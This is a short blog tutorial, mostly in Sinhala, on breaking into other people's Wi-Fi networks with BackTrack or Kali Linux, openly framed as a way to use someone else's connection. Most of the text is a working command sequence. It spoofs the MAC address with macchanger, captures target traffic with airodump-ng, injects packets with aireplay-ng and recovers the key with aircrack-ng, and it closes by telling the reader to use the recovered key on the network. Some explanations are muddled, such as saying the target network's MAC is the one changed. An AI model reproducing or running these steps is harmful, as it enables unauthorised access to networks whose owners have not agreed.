Wifi Hacking With Backtrack

Wifi Hacking with Backtrack

මචන්Zලා.. අද මම දෙන්නෙ wifi හැකින්ග් Tut එකක්.... කව්රුත් ආසා අතිනෙ වෙන එව්න්ගෙන් යැපෙන්නෙ... එක හින්දම මෙක දේන්නේ.... 

හරි... වැඩේ පටාන් ගමු.... Wifi hack කරන්න නම් මෙක ඔනා වෙනවා.. 

Compatible Wireless Adapter
Linux BackTrack

WiFi තියෙනම් Compatible Wireless Adapter එකක් කස්ටිය ගාව තියෙනවනෙ.


BackTrack OS/Kali Linux

BackTrack නැති කට්ටිය මෙතනින් ගන්න..(Backtrack Project is not Longer......එහෙමත් නැත්තන් Kali linux එකෙන් යන්න...) .Virtual Box එකෙන් කස්ට්යගේ comp එකට දාගන්න. 
(එකත් නැත්තන් පල කුබුරු කොටන්න..)

හරි... backtrack දාගත්තනන් දැන් වැඩෙට බහිමු...
දැන් උබලගෙ shell commands එක open කරන්න...
ගිහින් මෙ commands දෙන්න... දැනට තියෙන Wifi Networks පෙන්නයි...

{code=bash}airmon-ng{/code}

ඔය ra0 කියන wifi name එක උදාහරනයට අරන් තමා ඉස්සහරට කියන්නෙහ්... ඔගොල්ලො ra0 එක වෙනුවට use කරන්න ඔනෙ Hack කරන්න ඔනා wifi network එකෙ name එක...

දැන් මෙ command එක දෙන්න...

{code=bash}airmon-ng stop ra0{/code}


මෙතනදි කරන්න තියෙන්නෙ hack කරන්න තියෙන wifi network එකේ මැක් Adress එක change කරන්න.. 
දැන් මේ command එක දෙන්න... 

{code=bash}ifconfig ra0 down{/code}

දැන් මෙක දෙන්න
{code=bash}macchanger --mac 00:11:22:33:44:55 ra0{/code}

ඊට පස්සෙ මෙක දෙන්න....
{code=bash}airmon-ng start ra0{/code}

මෙතනදි කරන්නෙ අලුතින් දිපු මැක් adress එක හරියට වැඩ කරනවද බලන එක...

දැන් මෙ command එක දෙන්න....
{code=bash}airodump-ng ra0{/code}

 BSSID Code එක Copy කරන්න....එක ඉස්සරහට ඕන වෙනව.

දැන් මේ command එක කෙලින්න..

{code=bash}airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0{/code}


දැන් අපිට පුලුවන් Hack කරන්න යන wifi එකෙ real name , SSid එක හොයා ගන්න... තව පුලුවන් දැනට wifi එකෙ log වෙලා ඉන්න එකෙක්ව හොයාගන්න...

දැන් මෙ command එක කෙලලම ඇරපන්...


{code=bash}aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0{/code}




දැන් මෙකත් දියන්කො..

{code=bash}aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0{/code}


දැන් මෙකත් දියන් ඉතින්...

{code=bash}aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap){/code}


ඔන්න key එක හොයා ගත්තා... දැන් ඉතින් පුලුවන් එ පාස් key එක use කරලා නෙට්වර්ක් එක පාවිච්චි කරන්න... 

එහනම් මම කැපුනා... ජය ශ්‍රි...

Comments